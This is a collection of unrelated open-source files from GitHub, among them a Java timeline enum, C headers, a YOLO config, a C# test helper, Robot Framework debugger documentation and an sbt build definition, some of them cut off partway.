import org.andstatus.app.net.social.ApiRoutineEnum;
import org.andstatus.app.notification.NotificationEventType;
import org.andstatus.app.timeline.ListScope;
import org.andstatus.app.util.StringUtil;
import java.util.List;
import java.util.Set;
import java.util.stream.Collectors;
import java.util.stream.Stream;
import static org.andstatus.app.net.social.ApiRoutineEnum.ACTOR_TIMELINE;
import static org.andstatus.app.net.social.ApiRoutineEnum.DUMMY_API;
import static org.andstatus.app.net.social.ApiRoutineEnum.GET_FOLLOWERS;
import static org.andstatus.app.net.social.ApiRoutineEnum.GET_FRIENDS;
import static org.andstatus.app.net.social.ApiRoutineEnum.HOME_TIMELINE;
import static org.andstatus.app.net.social.ApiRoutineEnum.LIKED_TIMELINE;
import static org.andstatus.app.net.social.ApiRoutineEnum.NOTIFICATIONS_TIMELINE;
import static org.andstatus.app.net.social.ApiRoutineEnum.PRIVATE_NOTES;
import static org.andstatus.app.net.social.ApiRoutineEnum.PUBLIC_TIMELINE;
import static org.andstatus.app.net.social.ApiRoutineEnum.SEARCH_NOTES;
public enum TimelineType implements SelectableEnum {
UNKNOWN(ListScope.ORIGIN, "unknown", R.string.timeline_title_unknown, 0, DUMMY_API),
/** The Home timeline and other information (replies...). */
HOME(ListScope.USER, "home", R.string.timeline_title_home, 0, HOME_TIMELINE),
UNREAD_NOTIFICATIONS(ListScope.USER, "unread_notifications", R.string.unread_notifications, 0, NOTIFICATIONS_TIMELINE),
/** The Mentions timeline and other information (replies...). */
INTERACTIONS(ListScope.USER, "interactions", R.string.timeline_title_interactions, 0, NOTIFICATIONS_TIMELINE),
FAVORITES(ListScope.USER, "favorites", R.string.timeline_title_favorites, 0, LIKED_TIMELINE),
/** Notes by the selected Actor (where he is an Author or an Actor only (e.g. for Reblog/Retweet).
* This Actor is not necessarily one of our Accounts */
SENT(ListScope.USER, "sent", R.string.sent, R.string.menu_item_user_messages, ACTOR_TIMELINE),
SENT_AT_ORIGIN(ListScope.ACTOR_AT_ORIGIN, "sent_at_origin", R.string.sent, R.string.menu_item_user_messages, ACTOR_TIMELINE),
/** Latest notes of every Friend of this Actor
* (i.e of every actor, followed by this Actor).
* So this is essentially a list of "Friends". See {@link org.andstatus.app.database.table.GroupMembersTable} */
FRIENDS(ListScope.USER, "friends", R.string.friends, R.string.friends_of, GET_FRIENDS),
FOLLOWERS(ListScope.USER, "followers", R.string.followers, R.string.followers_of, GET_FOLLOWERS),
GROUP(ListScope.USER, "group", R.string.group, R.string.group_notes, DUMMY_API),
PUBLIC(ListScope.ORIGIN, "public", R.string.timeline_title_public, 0, PUBLIC_TIMELINE),
EVERYTHING(ListScope.ORIGIN, "everything", R.string.timeline_title_everything, 0, DUMMY_API),
SEARCH(ListScope.ORIGIN, "search", R.string.options_menu_search, 0, SEARCH_NOTES),
PRIVATE(ListScope.USER, "private", R.string.timeline_title_private, 0, PRIVATE_NOTES),
NOTIFICATIONS(ListScope.USER, "notifications", R.string.notifications_title, 0, NOTIFICATIONS_TIMELINE),
DRAFTS(ListScope.USER, "drafts", R.string.timeline_title_drafts, 0, DUMMY_API),
OUTBOX(ListScope.USER, "outbox", R.string.timeline_title_outbox, 0, DUMMY_API),
ACTORS(ListScope.ORIGIN, "users", R.string.user_list, 0, DUMMY_API),
CONVERSATION(ListScope.ORIGIN, "conversation", R.string.label_conversation, 0, DUMMY_API),
COMMANDS_QUEUE(ListScope.ORIGIN, "commands_queue", R.string.commands_in_a_queue, 0, DUMMY_API),
MANAGE_TIMELINES(ListScope.ORIGIN, "manages_timelines", R.string.manage_timelines, 0, DUMMY_API);
/** Code - identifier of the type */
private final String code;
@StringRes
private final int titleResId;
@StringRes
public final int titleResWithParamsId;
/** Api routine to download this timeline */
private final ApiRoutineEnum connectionApiRoutine;
public final ListScope scope;
TimelineType(ListScope scope, String code, @StringRes int resId, @StringRes int resWithParamsId,
ApiRoutineEnum connectionApiRoutine) {
this.scope = scope;
this.code = code;
this.titleResId = resId;
this.titleResWithParamsId = resWithParamsId;
this.connectionApiRoutine = connectionApiRoutine;
}
/** Returns the enum or UNKNOWN */
@NonNull
public static TimelineType load(String strCode) {
for (TimelineType value : TimelineType.values()) {
if (value.code.equals(strCode)) {
return value;
}
}
return UNKNOWN;
}
public static List<TimelineType> getDefaultMyAccountTimelineTypes() {
return defaultMyAccountTimelineTypes;
}
public static Set<TimelineType> getDefaultOriginTimelineTypes() {
return defaultOriginTimelineTypes;
}
@NonNull
public static TimelineType from(NotificationEventType event) {
switch (event) {
case OUTBOX:
return OUTBOX;
default:
return UNREAD_NOTIFICATIONS;
}
}
/** String to be used for persistence */
public String save() {
return code;
}
@Override
public String toString() {
return "timelineType:" + code;
}
@Override
public String getCode() {
return code;
}
/** Localized title for UI */
@Override
public CharSequence title(Context context) {
if (titleResId == 0 || context == null) {
return this.code;
} else {
return context.getText(titleResId);
}
}
public CharSequence title(Context context, Object ... params
|
{
"pile_set_name": "Github"
}
| null | null |
/*
* Copyright (C) 2014, 2015 Apple Inc. All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY APPLE INC. ``AS IS'' AND ANY
* EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
* PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR
* CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
* EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
* PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
* PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
* OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
* OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#ifndef ComplexGetStatus_h
#define ComplexGetStatus_h
#include "JSCJSValue.h"
#include "ObjectPropertyConditionSet.h"
#include "PropertyOffset.h"
namespace JSC {
class CodeBlock;
class StructureChain;
// This class is useful for figuring out how to inline a cached get-like access. We
// say "get-like" because this is appropriate for loading the GetterSetter object in
// a put_by_id that hits a setter. Notably, this doesn't figure out how to call
// accessors, or even whether they should be called. What it gives us, is a way of
// determining how to load the value from the requested property (identified by a
// StringImpl* uid) from an object of the given structure in the given CodeBlock,
// assuming that such an access had already been cached by Repatch (and so Repatch had
// already done a bunch of safety checks). This doesn't reexecute any checks that
// Repatch would have executed, and for prototype chain accesses, it doesn't ask the
// objects in the prototype chain whether their getOwnPropertySlot would attempt to
// intercept the access - so this really is only appropriate if you already know that
// one of the JITOperations had OK'd this for caching and that Repatch concurred.
//
// The typical use pattern is something like:
//
// ComplexGetStatus status = ComplexGetStatus::computeFor(...);
// switch (status.kind()) {
// case ComplexGetStatus::ShouldSkip:
// // Handle the case where this kind of access is possibly safe but wouldn't
// // pass the required safety checks. For example, if an IC gives us a list of
// // accesses and one of them is ShouldSkip, then we should pretend as if it
// // wasn't even there.
// break;
// case ComplexGetStatus::TakesSlowPath:
// // This kind of access is not safe to inline. Bail out of any attempst to
// // inline.
// break;
// case ComplexGetStatus::Inlineable:
// // The good stuff goes here. If it's Inlineable then the other properties of
// // the 'status' object will tell you everything you need to know about how
// // to execute the get-like operation.
// break;
// }
class ComplexGetStatus {
public:
enum Kind {
ShouldSkip,
TakesSlowPath,
Inlineable
};
ComplexGetStatus()
: m_kind(ShouldSkip)
, m_offset(invalidOffset)
{
}
static ComplexGetStatus skip()
{
return ComplexGetStatus();
}
static ComplexGetStatus takesSlowPath()
{
ComplexGetStatus result;
result.m_kind = TakesSlowPath;
return result;
}
static ComplexGetStatus computeFor(
Structure* headStructure, const ObjectPropertyConditionSet&, UniquedStringImpl* uid);
Kind kind() const { return m_kind; }
PropertyOffset offset() const { return m_offset; }
const ObjectPropertyConditionSet& conditionSet() const { return m_conditionSet; }
private:
Kind m_kind;
PropertyOffset m_offset;
ObjectPropertyConditionSet m_conditionSet;
};
} // namespace JSC
#endif // ComplexGetStatus_h
|
{
"pile_set_name": "Github"
}
| null | null |
/* Copyright (C) 1991, 1992, 1993, 1996, 1997, 1998, 1999, 2001, 2002, 2003,
2005, 2007, 2009, 2010 Free Software Foundation, Inc.
This file is part of the GNU C Library.
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2, or (at your option)
any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software Foundation,
Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */
#ifndef _FNMATCH_H
#define _FNMATCH_H 1
#define _GL_ARG_NONNULL( x ) /**/
#ifdef __cplusplus
extern "C" {
#endif
/* We #undef these before defining them because some losing systems
(HP-UX A.08.07 for example) define these in <unistd.h>. */
#undef FNM_PATHNAME
#undef FNM_NOESCAPE
#undef FNM_PERIOD
/* Bits set in the FLAGS argument to `fnmatch'. */
#define FNM_PATHNAME (1 << 0) /* No wildcard can ever match `/'. */
#define FNM_NOESCAPE (1 << 1) /* Backslashes don't quote special chars. */
#define FNM_PERIOD (1 << 2) /* Leading `.' is matched only explicitly. */
#if !defined _POSIX_C_SOURCE || _POSIX_C_SOURCE < 2 || defined _GNU_SOURCE
# define FNM_FILE_NAME FNM_PATHNAME /* Preferred GNU name. */
# define FNM_LEADING_DIR (1 << 3) /* Ignore `/...' after a match. */
# define FNM_CASEFOLD (1 << 4) /* Compare without regard to case. */
# define FNM_EXTMATCH (1 << 5) /* Use ksh-like extended matching. */
#endif
/* Value returned by `fnmatch' if STRING does not match PATTERN. */
#define FNM_NOMATCH 1
/* This value is returned if the implementation does not support
`fnmatch'. Since this is not the case here it will never be
returned but the conformance test suites still require the symbol
to be defined. */
#ifdef _XOPEN_SOURCE
# define FNM_NOSYS (-1)
#endif
/* Match NAME against the file name pattern PATTERN,
returning zero if it matches, FNM_NOMATCH if not. */
extern int fnmatch (const char *__pattern, const char *__name,
int __flags)
_GL_ARG_NONNULL ((1, 2));
#ifdef __cplusplus
}
#endif
#endif /* fnmatch.h */
|
{
"pile_set_name": "Github"
}
| null | null |
module.exports = {
urls: ['/add'],
routers: {
get: function (req, res) {
var username = "username" + new Date().getTime();
var password = "password" + new Date().getTime();
var User = req.models.User;
User.create({
username: username,
password: password
}).then(function(created) {
res.send(created);
});
}
}
};
|
{
"pile_set_name": "Github"
}
| null | null |
[net]
# Testing
batch=1
subdivisions=1
# Training
# batch=64
# subdivisions=8
width=224
height=224
channels=3
momentum=0.9
decay=0.0005
angle=0
saturation = 1.5
exposure = 1.5
hue=.1
learning_rate=0.001
burn_in=1000
max_batches = 500200
policy=steps
steps=400000,450000
scales=.1,.1
[convolutional]
batch_normalize=1
filters=32
size=3
stride=1
pad=1
activation=leaky
[maxpool]
size=2
stride=2
[convolutional]
batch_normalize=1
filters=64
size=3
stride=1
pad=1
activation=leaky
[maxpool]
size=2
stride=2
[convolutional]
batch_normalize=1
filters=128
size=3
stride=1
pad=1
activation=leaky
[convolutional]
batch_normalize=1
filters=64
size=1
stride=1
pad=1
activation=leaky
[convolutional]
batch_normalize=1
filters=128
size=3
stride=1
pad=1
activation=leaky
[maxpool]
size=2
stride=2
[convolutional]
batch_normalize=1
filters=256
size=3
stride=1
pad=1
activation=leaky
[convolutional]
batch_normalize=1
filters=128
size=1
stride=1
pad=1
activation=leaky
[convolutional]
batch_normalize=1
filters=256
size=3
stride=1
pad=1
activation=leaky
[maxpool]
size=2
stride=2
[convolutional]
batch_normalize=1
filters=512
size=3
stride=1
pad=1
activation=leaky
[convolutional]
batch_normalize=1
filters=256
size=1
stride=1
pad=1
activation=leaky
[convolutional]
batch_normalize=1
filters=512
size=3
stride=1
pad=1
activation=leaky
[convolutional]
batch_normalize=1
filters=256
size=1
stride=1
pad=1
activation=leaky
[convolutional]
batch_normalize=1
filters=512
size=3
stride=1
pad=1
activation=leaky
[maxpool]
size=2
stride=2
[convolutional]
batch_normalize=1
filters=1024
size=3
stride=1
pad=1
activation=leaky
[convolutional]
batch_normalize=1
filters=512
size=1
stride=1
pad=1
activation=leaky
[convolutional]
batch_normalize=1
filters=1024
size=3
stride=1
pad=1
activation=leaky
[convolutional]
batch_normalize=1
filters=512
size=1
stride=1
pad=1
activation=leaky
[convolutional]
batch_normalize=1
filters=1024
size=3
stride=1
pad=1
activation=leaky
#######
[convolutional]
batch_normalize=1
size=3
stride=1
pad=1
filters=1024
activation=leaky
[convolutional]
batch_normalize=1
size=3
stride=1
pad=1
filters=1024
activation=leaky
[route]
layers=-9
[convolutional]
batch_normalize=1
size=1
stride=1
pad=1
filters=64
activation=leaky
[reorg]
stride=2
[route]
layers=-1,-4
[convolutional]
batch_normalize=1
size=3
stride=1
pad=1
filters=1024
activation=leaky
[convolutional]
size=1
stride=1
pad=1
filters=425
activation=linear
[region]
anchors = 0.57273, 0.677385, 1.87446, 2.06253, 3.33843, 5.47434, 7.88282, 3.52778, 9.77052, 9.16828
bias_match=1
classes=80
coords=4
num=5
softmax=1
jitter=.3
rescore=1
object_scale=5
noobject_scale=1
class_scale=1
coord_scale=1
absolute=1
thresh = .6
random=1
|
{
"pile_set_name": "Github"
}
| null | null |
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE pkgmetadata SYSTEM "http://www.gentoo.org/dtd/metadata.dtd">
<pkgmetadata>
<maintainer type="project">
<email>haskell@gentoo.org</email>
<name>Gentoo Haskell</name>
</maintainer>
<longdescription>
A new all Haskell "tagged" DFA regex engine, inspired by libtre
</longdescription>
</pkgmetadata>
|
{
"pile_set_name": "Github"
}
| null | null |
// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License. See LICENSE in the project root for license information.
using System;
using System.Collections;
using System.Collections.Generic;
using FluentAssertions.Equivalency;
using Microsoft.R.ExecutionTracing;
using Microsoft.R.StackTracing;
using NSubstitute;
namespace Microsoft.R.Host.Client.Test {
internal class TracebackBuilder : IReadOnlyList<IRStackFrame> {
public struct AnyType {
public static implicit operator string (AnyType any) => "<ANY>";
public static implicit operator int (AnyType any) => -1;
}
public static readonly AnyType Any = default(AnyType);
private readonly List<IRStackFrame> _frames = new List<IRStackFrame>();
private Func<EquivalencyAssertionOptions<IRStackFrame[]>, EquivalencyAssertionOptions<IRStackFrame[]>> _config = options => options;
public int Count {
get {
return _frames.Count;
}
}
public IRStackFrame this[int index] {
get {
return _frames[index];
}
}
public IEnumerator<IRStackFrame> GetEnumerator() {
return _frames.GetEnumerator();
}
IEnumerator IEnumerable.GetEnumerator() {
return _frames.GetEnumerator();
}
public EquivalencyAssertionOptions<IRStackFrame[]> Configure(EquivalencyAssertionOptions<IRStackFrame[]> options) {
return _config(options);
}
public void Add(string fileName, int? lineNumber, string call, string environmentName) {
string itemPath = "[" + _frames.Count + "].";
var frame = Substitute.For<IRStackFrame>();
if (fileName != Any) {
frame.FileName.Returns(fileName);
}
if (lineNumber != Any) {
frame.LineNumber.Returns(lineNumber);
}
if (call != Any) {
frame.Call.Returns(call);
}
if (environmentName != Any) {
frame.EnvironmentName.Returns(environmentName);
}
_frames.Add(frame);
var oldConfig = _config;
_config = options => {
options = oldConfig(options);
if (fileName != Any) {
options = options.Including(ctx => ctx.SelectedMemberPath == itemPath + nameof(IRStackFrame.FileName));
}
if (lineNumber != Any) {
options = options.Including(ctx => ctx.SelectedMemberPath == itemPath + nameof(IRStackFrame.LineNumber));
}
if (call != Any) {
options = options.Including(ctx => ctx.SelectedMemberPath == itemPath + nameof(IRStackFrame.Call));
}
if (environmentName != Any) {
options = options.Including(ctx => ctx.SelectedMemberPath == itemPath + nameof(IRStackFrame.EnvironmentName));
}
return options;
};
}
public void Add(string fileName, int lineNumber, string call) {
Add(fileName, lineNumber, call, Any);
}
public void Add(string fileName, int lineNumber) {
Add(fileName, lineNumber, Any);
}
public void Add(SourceFile sourceFile, int lineNumber, string call, string environmentName) {
Add(sourceFile.FilePath, lineNumber, call, environmentName);
}
public void Add(SourceFile sourceFile, int lineNumber, string call) {
Add(sourceFile.FilePath, lineNumber, call);
}
public void Add(SourceFile sourceFile, int lineNumber) {
Add(sourceFile.FilePath, lineNumber);
}
public void Add(RSourceLocation location, int offset, string call) {
Add(location.FileName, location.LineNumber + offset, call);
}
public void Add(RSourceLocation location, int offset = 0) {
Add(location.FileName, location.LineNumber + offset, Any);
}
public void Add(RSourceLocation location, string call) {
Add(location.FileName, location.LineNumber, call);
}
}
}
|
{
"pile_set_name": "Github"
}
| null | null |
<?php
/*
Template Name: Page No Title
*/
get_header(); ?>
<?php
if( have_posts() ):
while( have_posts() ): the_post(); ?>
<h1>This is my Static Title</h1>
<small>Posted on: <?php the_time('F j, Y'); ?> at <?php the_time('g:i a'); ?>, in <?php the_category(); ?></small>
<p><?php the_content(); ?></p>
<hr>
<?php endwhile;
endif;
?>
<?php get_footer(); ?>
|
{
"pile_set_name": "Github"
}
| null | null |
-----BEGIN CERTIFICATE-----
MIICQzCCAemgAwIBAgIQadOYD65Y3ytwRxqobjm2OTAKBggqhkjOPQQDAjBzMQsw
CQYDVQQGEwJVUzETMBEGA1UECBMKQ2FsaWZvcm5pYTEWMBQGA1UEBxMNU2FuIEZy
YW5jaXNjbzEZMBcGA1UEChMQb3JnNS5leGFtcGxlLmNvbTEcMBoGA1UEAxMTY2Eu
b3JnNS5leGFtcGxlLmNvbTAeFw0xODA0MTcwMTI2NDFaFw0yODA0MTQwMTI2NDFa
MHMxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpDYWxpZm9ybmlhMRYwFAYDVQQHEw1T
YW4gRnJhbmNpc2NvMRkwFwYDVQQKExBvcmc1LmV4YW1wbGUuY29tMRwwGgYDVQQD
ExNjYS5vcmc1LmV4YW1wbGUuY29tMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE
UPoXa8KJUqd4FXX6RvUsoKVdZHK1fQztQKhCyMOwFAVwhsGGEGp0Dw+vLbU7iE3R
bjjy0v9Wi9JoKh3ViSkMH6NfMF0wDgYDVR0PAQH/BAQDAgGmMA8GA1UdJQQIMAYG
BFUdJQAwDwYDVR0TAQH/BAUwAwEB/zApBgNVHQ4EIgQgPrnZYjpqEW5QkPNtCBin
uuk0WGD3EaqkfnkgZpBfyvQwCgYIKoZIzj0EAwIDSAAwRQIhAPVAZs87tHhDlreT
0iOmPJgv5XJ6s85uK59jHARu0YlvAiBlGksg8HkuJVK4GDCSPTFEINH4FgD8h3dO
Z11etT6MDw==
-----END CERTIFICATE-----
|
{
"pile_set_name": "Github"
}
| null | null |
<html>
<head>
<link href="PLUGINS_ROOT/org.robotframework.ide.eclipse.main.plugin.doc.user/help/style.css" rel="stylesheet" type="text/css"/>
</head>
<body>
<a href="RED/../../../../../help/index.html">RED - Robot Editor User Guide</a> > <a href="RED/../../../../../help/user_guide/user_guide.html">User guide</a> > <a href="RED/../../../../../help/user_guide/launching.html">Launching Tests</a> > <a href="RED/../../../../../help/user_guide/launching/debug.html">Debugging Robot</a> >
<h2>Hitting a breakpoint during debug execution</h2>
<p>Whenever debugger suspends the execution there are many useful informations presented to user as well as new
opportunities to influence the running tests appear. First of all the toolbar buttons gets activated:
</p>
<img src="images/debug_toolbar.png"/>
<p>moving from left to right:</p>
<ul>
<li><b>Skip All Breakpoints</b> - allow to continue execution onwards without stopping on defined breakpoints
(globally disabling all the breakpoints)
</li>
<li><b>Resume</b> - <kbd>F8</kbd> described in <a href="../exec_control.html">Controlling execution</a></li>
<li><b>Suspend</b> - as above</li>
<li><b>Terminate</b> - <kbd>Ctrl</kbd>+<kbd>F2</kbd> as above</li>
<li><b>Disconnect</b> - as above</li>
<li><b>Step Into</b> - <kbd>F5</kbd> - each <kbd>F5</kbd> key press will execute active line and move to next
one. If active line consists Keyword or embedded TestCase, test executor will jump into item and execute
it line by line. To exit from executing inherited items use Step Return (<kbd>F7</kbd>)</li>
<li><b>Step Over</b> - <kbd>F6</kbd> - each <kbd>F6</kbd> key press will execute active line and move to next
one. If keyword exists in current line, keyword result will be returned without going into Keyword content</li>
<li><b>Step Return</b> - <kbd>F7</kbd> - allows to return to main TestCase execution from embedded TestCase
or Keyword if Step Into was used before</li>
</ul>
<h3>Debug view</h3>
<p>When execution is suspended the <b>Debug</b> view shows all the frames on current path in execution tree.
Bottom part of this path directly corresponds to the tree which can be seen in <b>Execution</b> view as
depicted below:
</p>
<img src="images/debug_debug_view.png"/><br/>
<img src="images/debug_execution_view.png"/>
<p>The bottom frame corresponds to <code>Project</code> suite (this is a directory in file system, so there is a
little directory decoration visible). Next frame corresponds to <code>Calculations</code> suite (which is a
<code>calculations.robot</code> file) and the frame above it represents <code>Divisions</code> test inside that
suite. Next frames do not correspond to any node inside the execution tree visible in <b>Execution</b> view. It
can be read that stopped execution is currently inside <code>Divisions</code> test at instruction in line
<code>35</code>, which called a keyword <code>Divide</code> which then called another keyword
<code>BinaryDivision</code> from line <code>57</code> which finally called library keyword <code>Evaluate</code>
coming from <code>BuiltIn</code> library at line <code>61</code>.
</p>
<p>Additionally you may see that there is a single execution thread (RF executes tests in single thread); the
execution is suspended and agent is communicating with RED using localhost at port <code>59344</code>.
</p>
<h3 id="debug_shell_view">Debug Shell view</h3>
<p>Whenever execution is suspended and a frame inside <b>Debug</b> view is selected then it is possible to use
<b>Debug Shell</b> view in order to evaluate different expressions. The view is not opened in <b>Debug</b>
perspective by default and needs to be opened using <a class="command" href="javascript:executeCommand('org.eclipse.ui.views.showView(org.eclipse.ui.views.showView.viewId=org.robotframework.ide.DebugShell)')">
Window -> Show View -> Other... -> Robot -> Debug Shell</a>.
</p>
<img src="images/debug_shell.png"/>
<p>The view allows to evaluate expressions in 3 modes:
</p>
<ul>
<li><b>ROBOT</b> in which <b>keyword</b> calls can be executed; under the hood it uses <code>BuiltIn.Run Keyword</code>
keyword from standard library,
</li>
<li><b>VARIABLE</b> in which variable-like expressions can be evaluated,
</li>
<li><b>PYTHON</b> which allows to evaluate Python expressions; under the hood the expression is passed to
<code>BuiltIn.Evaluate</code> keyword which effectively calls Python <code>eval()</code>.
</li>
</ul>
<p>Switching between modes is done using view buttons or through <kbd>Ctrl + T</kbd> shortcut. The view
remembers last 5 exuected expressions so it is possible to switch between them using up/down arrows.
In <b>ROBOT</b> and <b>PYTHON</b> mode it is possible to continue expression in multiple lines using
<kbd>Shift+Enter</kbd> keys.
</p>
<h3>Variables view</h3>
<p>Whenever you select some frame inside <b>Debug</b> view the Robot variables defined inside it are shown in
<b>Variables</b> view. This view handles scalar, list and dictionary variables. The scalar variable only shows
its value while the other two types are showing also the their contents inside it. Depending on the type of
variable the icon have different color assigned as visible on image below:
</p>
<img src="images/debug_variables.png"/>
<p>As you can see some of the variables are displayed under <b>Automatic Variables</b> node. This is a place
where all the variables which are built-in into the Robot are gathered together (refer to <a class="external" href="http://robotframework.org/robotframework/latest/RobotFrameworkUserGuide.html#built-in-variables" target="_blank">
RF User Guide</a>). All the user variables are displayed on top-level.
</p>
<p>Variable scope (see <a class="external" href="http://robotframework.org/robotframework/latest/RobotFrameworkUserGuide.html#variable-scopes" target="_blank">
User Guide</a> on this topic) is reflected in this view using icon decoration: <b>G</b>, <b>S</b>, <b>T</b> or <b>L</b>
is placed on variable icon for <b>Global</b>, <b>Suite</b>, <b>Test</b>, <b>Local</b> scopes. You may find out
that global-scoped variables are visible for every single stack frame, suite-scoped variables are only visible
in a suite frame and frames below, test-scoped variables only in test frame and below while local-scoped variables
only in current frame. Of course for example <code>${SUITE_NAME}</code> automatic variable (which has suite scope)
may be visible for all suite frames, however it may have different values as the suites are nested.
</p>
<p>For both dictionaries and lists the actual type of the python object is written in <b>Value</b> column. On the picture above
<b>DotDict[3]</b> for <code>&{dictionary}</code> variable mean that in python this object has type <b>DotDict</b>,
the rest mean
|
{
"pile_set_name": "Github"
}
| null | null |
import Common._
import Unfiltered._
import Dependencies._
import ReleaseTransformations._
Common.settings
enablePlugins(ScalaUnidocPlugin)
// unidoc publish settings
name := "unfiltered-all"
artifacts := Classpaths.artifactDefs(Seq(packageDoc in Compile)).value
packagedArtifacts := Classpaths.packaged(Seq(packageDoc in Compile)).value
Defaults.packageTaskSettings(
packageDoc in Compile, (unidoc in Compile).map{_.flatMap(Path.allSubpaths)}
)
releaseCrossBuild := true
releaseProcess := Seq[ReleaseStep](
checkSnapshotDependencies,
inquireVersions,
runClean,
runTest,
setReleaseVersion,
commitReleaseVersion,
tagRelease,
releaseStepCommandAndRemaining("+publishSigned"),
releaseStepCommandAndRemaining("sonatypeBundleRelease"),
setNextVersion,
commitNextVersion,
pushChanges,
)
val specs2ProjectId = "specs2"
val scalatestProjectId = "scalatest"
val filterProjectId = "filter"
// avoid cyclic error
def dependsOnInTest(id: String) =
unmanagedClasspath in Test ++= (fullClasspath in (local(id), Compile)).value
val dependsOnSpecs2InTest = dependsOnInTest(specs2ProjectId)
lazy val library: Project = module("unfiltered")(
dirName = "library",
projectId = "unfiltered"
).settings(
description := "Core library for describing requests and responses",
dependsOnSpecs2InTest,
dependsOnInTest(scalatestProjectId),
dependsOnInTest(filterProjectId),
libraryDependencies ++= Seq(
"commons-codec" % "commons-codec" % commonsCodecVersion,
specs2Dep.value % "test",
"org.scalatest" %% "scalatest" % scalatestVersion % "test",
"org.scalatestplus" %% "scalacheck-1-14" % scalatestScalacheckVersion % "test",
),
libraryDependencies ++= {
CrossVersion.partialVersion(scalaVersion.value) match {
case Some((2, v)) if v >= 11 =>
Seq("org.scala-lang.modules" %% "scala-xml" % scalaXmlVersion)
case _ =>
Nil
}
}
).dependsOn(util)
lazy val directives = module("directives")().settings(
description := "monadic api for unfiltered"
).dependsOn(library, specs2 % "test")
lazy val filters = module(filterProjectId)().settings(
description := "Server binding for Java Servlet filters",
libraryDependencies += servletApiDep,
dependsOnSpecs2InTest
).dependsOn(library)
lazy val filtersAsync = module("filter-async")().settings(
description := "Server binding for Java Servlet 3.0 async filters",
libraryDependencies += servletApiDep
).dependsOn(filters, specs2 % "test")
lazy val agents = module("agents")(
srcPath = "unfiltered/request"
).settings(
description := "User-Agent request matchers",
libraryDependencies += "org.scalatest" %% "scalatest" % scalatestVersion % "test",
libraryDependencies ++= Seq(servletApiDep) ++ integrationTestDeps.value
).dependsOn(
library,
scalatest % "test",
filters % "test"
)
lazy val uploads = module("uploads")(
srcPath = "unfiltered/request"
).settings(
description := "Generic support for multi-part uploads",
libraryDependencies ++= Seq(
"commons-io" % "commons-io" % commonsIoVersion
) ++ integrationTestDeps.value
).dependsOn(library, specs2 % "test")
lazy val filterUploads = module("filter-uploads")(
srcPath = "unfiltered/request"
).settings(
description := "Support for multi-part uploads for servlet filters",
libraryDependencies ++= Seq(
servletApiDep,
"commons-fileupload" % "commons-fileupload" % commonsFileUploadVersion
) ++ integrationTestDeps.value
).dependsOn(uploads, filters, specs2 % "test")
lazy val util = module("util")().settings(
libraryDependencies += specs2Dep.value % "test"
)
lazy val jetty = module("jetty")().settings(
description := "Jetty server embedding module",
libraryDependencies := Seq(
"org.eclipse.jetty" % "jetty-webapp" % jettyVersion
)
).dependsOn(util)
lazy val nettyServer = module("netty-server")(
srcPath = "unfiltered/netty"
).settings(
description := "Netty server embedding module",
dependsOnSpecs2InTest,
libraryDependencies += "javax.activation" % "activation" % javaxActivationVersion,
libraryDependencies ++= integrationTestDeps.value
).dependsOn(netty, util)
lazy val netty = module("netty")().settings(
description := "Netty server binding module",
dependsOnSpecs2InTest,
libraryDependencies ++= {
("io.netty" % "netty-codec-http" % nettyVersion) +:
("io.netty" % "netty-handler" % nettyVersion) +:
("io.netty" % "netty-transport-native-epoll" % nettyVersion classifier "linux-x86_64") +:
("io.netty" % "netty-transport-native-kqueue" % nettyVersion classifier "osx-x86_64") +:
integrationTestDeps.value
}
).dependsOn(library)
lazy val specs2: Project = module(specs2ProjectId)().settings(
description := "Facilitates testing Unfiltered servers with Specs2",
libraryDependencies ++= {
specs2Dep.value :: okHttp
}
).dependsOn(filters, jetty, nettyServer)
lazy val scalatest = module(scalatestProjectId)().settings(
description := "Facilitates testing Unfiltered servers with ScalaTest",
libraryDependencies ++= {
okHttp :+
("org.scalatest" %% "scalatest-core" % scalatestVersion)
}
).dependsOn(filters, jetty, nettyServer)
lazy val json4s = module("json4s")(
srcPath = "unfiltered"
).settings(
description := "Json4s request matchers and response functions",
libraryDependencies ++= {
Seq("org.json4s" %% "json4s-native" % json4sVersion) ++ integrationTestDeps.value
}
).dependsOn(library, filters % "test", specs2 % "test")
lazy val websockets = module("netty-websockets")().settings(
description := "WebSockets plan support using Netty",
libraryDependencies ++= integrationTestDeps.value,
libraryDependencies += "com.ning" % "async-http-client" % asyncHttpClientVersion % "test"
).dependsOn(nettyServer, specs2 % "test")
lazy val nettyUploads = module("netty-uploads")().settings(
description := "Uploads plan support using Netty",
libraryDependencies ++= integrationTestDeps.value,
parallelExecution in Test := false
).dependsOn(nettyServer, uploads, specs2 % "test")
|
{
"pile_set_name": "Github"
}
| null | null |
require 'spec_helper'
describe "SignoutStories" do
let(:member) {
